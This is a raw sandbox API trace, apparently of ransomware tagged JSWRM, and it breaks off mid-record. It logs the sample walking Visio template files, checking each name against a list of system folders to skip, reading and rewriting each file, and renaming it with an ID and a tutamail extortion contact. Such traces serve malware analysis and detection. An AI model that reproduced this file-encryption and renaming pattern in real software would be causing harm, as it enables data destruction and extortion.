[0144.354] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_SUBPROCESS_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_subprocess_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_SUBPROCESS_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_subprocess_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.355] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49145b3, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49145b3, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49145b3, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xf0dd, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="AUDIT_SUBPROCESS_U.VSTX", cAlternateFileName="AU0DF1~1.VST")) returned 1 [0144.355] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_U.VSTX", lpString2=".") returned 1 [0144.355] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_U.VSTX", lpString2="..") returned 1 [0144.355] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_U.VSTX", lpString2="...") returned 1 [0144.355] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_U.VSTX", lpString2="windows") returned -1 [0144.356] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_U.VSTX", lpString2="recovery") returned -1 [0144.356] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_U.VSTX", lpString2="perflogs") returned -1 [0144.356] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_U.VSTX", lpString2="documents and settings") returned -1 [0144.356] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.356] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_U.VSTX", lpString2="system volume information") returned -1 [0144.356] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_U.VSTX", lpString2="msocache") returned -1 [0144.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SUBPROCESS_U.VSTX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0144.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SUBPROCESS_U.VSTX", cchWideChar=23, lpMultiByteStr=0x241128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_SUBPROCESS_U.VSTX", lpUsedDefaultChar=0x0) returned 23 [0144.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SUBPROCESS_U.VSTX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0144.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SUBPROCESS_U.VSTX", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_SUBPROCESS_U.VSTX", lpUsedDefaultChar=0x0) returned 23 [0144.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.356] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_SUBPROCESS_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_subprocess_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.357] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=61661) returned 1 [0144.357] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.357] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xf0d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xf0d0, lpOverlapped=0x0) returned 1 [0144.364] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.364] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xf0d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xf0d0, lpOverlapped=0x0) returned 1 [0144.364] CloseHandle (hObject=0x314) returned 1 [0144.364] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_SUBPROCESS_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_subprocess_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_SUBPROCESS_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_subprocess_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.365] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x351cbc8, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x351cbc8, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x351cbc8, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x15838, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="AUDIT_U.VSSX", cAlternateFileName="AUDIT_~2.VSS")) returned 1 [0144.366] lstrcmpiW (lpString1="AUDIT_U.VSSX", lpString2=".") returned 1 [0144.366] lstrcmpiW (lpString1="AUDIT_U.VSSX", lpString2="..") returned 1 [0144.366] lstrcmpiW (lpString1="AUDIT_U.VSSX", lpString2="...") returned 1 [0144.366] lstrcmpiW (lpString1="AUDIT_U.VSSX", lpString2="windows") returned -1 [0144.366] lstrcmpiW (lpString1="AUDIT_U.VSSX", lpString2="recovery") returned -1 [0144.366] lstrcmpiW (lpString1="AUDIT_U.VSSX", lpString2="perflogs") returned -1 [0144.366] lstrcmpiW (lpString1="AUDIT_U.VSSX", lpString2="documents and settings") returned -1 [0144.366] lstrcmpiW (lpString1="AUDIT_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.366] lstrcmpiW (lpString1="AUDIT_U.VSSX", lpString2="system volume information") returned -1 [0144.366] lstrcmpiW (lpString1="AUDIT_U.VSSX", lpString2="msocache") returned -1 [0144.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.366] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.367] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=88120) returned 1 [0144.367] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.368] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x15830, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x15830, lpOverlapped=0x0) returned 1 [0144.375] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.375] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x15830, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x15830, lpOverlapped=0x0) returned 1 [0144.376] CloseHandle (hObject=0x314) returned 1 [0144.376] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.377] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x493a87e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x493a87e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x493a87e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4eeb, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="AUDIT_U.VSTX", cAlternateFileName="AUF87A~1.VST")) returned 1 [0144.377] lstrcmpiW (lpString1="AUDIT_U.VSTX", lpString2=".") returned 1 [0144.377] lstrcmpiW (lpString1="AUDIT_U.VSTX", lpString2="..") returned 1 [0144.377] lstrcmpiW (lpString1="AUDIT_U.VSTX", lpString2="...") returned 1 [0144.377] lstrcmpiW (lpString1="AUDIT_U.VSTX", lpString2="windows") returned -1 [0144.377] lstrcmpiW (lpString1="AUDIT_U.VSTX", lpString2="recovery") returned -1 [0144.377] lstrcmpiW (lpString1="AUDIT_U.VSTX", lpString2="perflogs") returned -1 [0144.377] lstrcmpiW (lpString1="AUDIT_U.VSTX", lpString2="documents and settings") returned -1 [0144.377] lstrcmpiW (lpString1="AUDIT_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.377] lstrcmpiW (lpString1="AUDIT_U.VSTX", lpString2="system volume information") returned -1 [0144.377] lstrcmpiW (lpString1="AUDIT_U.VSTX", lpString2="msocache") returned -1 [0144.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_U.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_U.VSTX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_U.VSTX", lpUsedDefaultChar=0x0) returned 12 [0144.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_U.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_U.VSTX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_U.VSTX", lpUsedDefaultChar=0x0) returned 12 [0144.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.378] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=20203) returned 1 [0144.378] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.378] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4ee0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4ee0, lpOverlapped=0x0) returned 1 [0144.381] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.381] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4ee0, lpOverlapped=0x0) returned 1 [0144.381] CloseHandle (hObject=0x314) returned 1 [0144.381] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.416] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ccc9d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x18ccc9d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1965688, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xb841, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASFLO_M.VSSX", cAlternateFileName="BASFLO~1.VSS")) returned 1 [0144.416] lstrcmpiW (lpString1="BASFLO_M.VSSX", lpString2=".") returned 1 [0144.416] lstrcmpiW (lpString1="BASFLO_M.VSSX", lpString2="..") returned 1 [0144.416] lstrcmpiW (lpString1="BASFLO_M.VSSX", lpString2="...") returned 1 [0144.416] lstrcmpiW (lpString1="BASFLO_M.VSSX", lpString2="windows") returned -1 [0144.416] lstrcmpiW (lpString1="BASFLO_M.VSSX", lpString2="recovery") returned -1 [0144.416] lstrcmpiW (lpString1="BASFLO_M.VSSX", lpString2="perflogs") returned -1 [0144.416] lstrcmpiW (lpString1="BASFLO_M.VSSX", lpString2="documents and settings") returned -1 [0144.416] lstrcmpiW (lpString1="BASFLO_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.416] lstrcmpiW (lpString1="BASFLO_M.VSSX", lpString2="system volume information") returned -1 [0144.417] lstrcmpiW (lpString1="BASFLO_M.VSSX", lpString2="msocache") returned -1 [0144.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASFLO_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASFLO_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASFLO_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basflo_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.419] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=47169) returned 1 [0144.419] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.419] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb840, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xb840, lpOverlapped=0x0) returned 1 [0144.424] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.424] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb840, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xb840, lpOverlapped=0x0) returned 1 [0144.425] CloseHandle (hObject=0x314) returned 1 [0144.425] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASFLO_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basflo_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASFLO_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basflo_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.426] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x493a87e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x493a87e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x493a87e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4abe, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASFLO_M.VSTX", cAlternateFileName="BASFLO~1.VST")) returned 1 [0144.426] lstrcmpiW (lpString1="BASFLO_M.VSTX", lpString2=".") returned 1 [0144.426] lstrcmpiW (lpString1="BASFLO_M.VSTX", lpString2="..") returned 1 [0144.426] lstrcmpiW (lpString1="BASFLO_M.VSTX", lpString2="...") returned 1 [0144.426] lstrcmpiW (lpString1="BASFLO_M.VSTX", lpString2="windows") returned -1 [0144.426] lstrcmpiW (lpString1="BASFLO_M.VSTX", lpString2="recovery") returned -1 [0144.426] lstrcmpiW (lpString1="BASFLO_M.VSTX", lpString2="perflogs") returned -1 [0144.426] lstrcmpiW (lpString1="BASFLO_M.VSTX", lpString2="documents and settings") returned -1 [0144.426] lstrcmpiW (lpString1="BASFLO_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.426] lstrcmpiW (lpString1="BASFLO_M.VSTX", lpString2="system volume information") returned -1 [0144.426] lstrcmpiW (lpString1="BASFLO_M.VSTX", lpString2="msocache") returned -1 [0144.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASFLO_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0144.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASFLO_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0144.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASFLO_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basflo_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.427] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=19134) returned 1 [0144.427] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.428] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4ab0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4ab0, lpOverlapped=0x0) returned 1 [0144.432] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.432] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4ab0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4ab0, lpOverlapped=0x0) returned 1 [0144.433] CloseHandle (hObject=0x314) returned 1 [0144.433] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASFLO_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basflo_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASFLO_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basflo_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.434] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b5ed86, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3b5ed86, 